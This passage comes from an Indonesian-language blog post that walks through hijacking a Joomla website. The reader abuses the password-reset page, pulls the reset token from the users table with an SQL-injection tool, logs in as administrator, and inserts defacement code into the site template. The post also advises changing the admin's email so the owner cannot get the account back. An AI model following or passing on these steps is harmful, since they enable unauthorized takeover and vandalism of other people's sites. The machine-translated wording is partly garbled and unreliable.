{TOTAL Hash}: {} SALT ORIGINAL. Jadi untuk hack bahwa password memakan waktu dan waktu …

Cara termudah untuk hack adalah untuk mereset password Admin!

Admin Password Reset

Pergi ke:
http://www.site.com/index.php?option=com_user&view=reset
Ini adalah standar Joomla! query untuk permintaan reset password

Lupa Password Anda? Halaman akan memuat.
Dalam E-mail Address: masukkan email admin (dalam kasus kami itu adalah: info@site.com) dan tekan Submit.
Jika Anda menemukan email yang tepat admin, Konfirmasikan akun Anda. halaman akan memuat, meminta Token:

Mencari Token

Untuk menemukan tanda kembali ke reiluke SQLiHelper 2,7 dan username sampah dan aktivasi dari jos153_users Nama Kolom

username: admin
aktivasi: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d adalah 32 Token verivikasi char, masuk dan pres Kirim.

Jika Anda melakukan semuanya ok, Istirahatkan halaman Password akan memuat. Masukkan password baru anda …

Setelah itu pergi ke:
http://www.site.com/administrator/
Standar Joomla konten portal sistem manajemen

Masukkan admin username dan password Anda, klik Login
Pergi ke Extensions >> Template Manager >> default Template Nama >> Edit HTML
Dalam Editor Template HTML memasukkan kode dirusak Anda, klik Terapkan, Simpan dan Anda selesai!

Untuk membuat hidup lebih sengsara admin, klik admin di jendela Joomla utama dan di halaman Rincian Pengguna perubahan E-mail admin

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s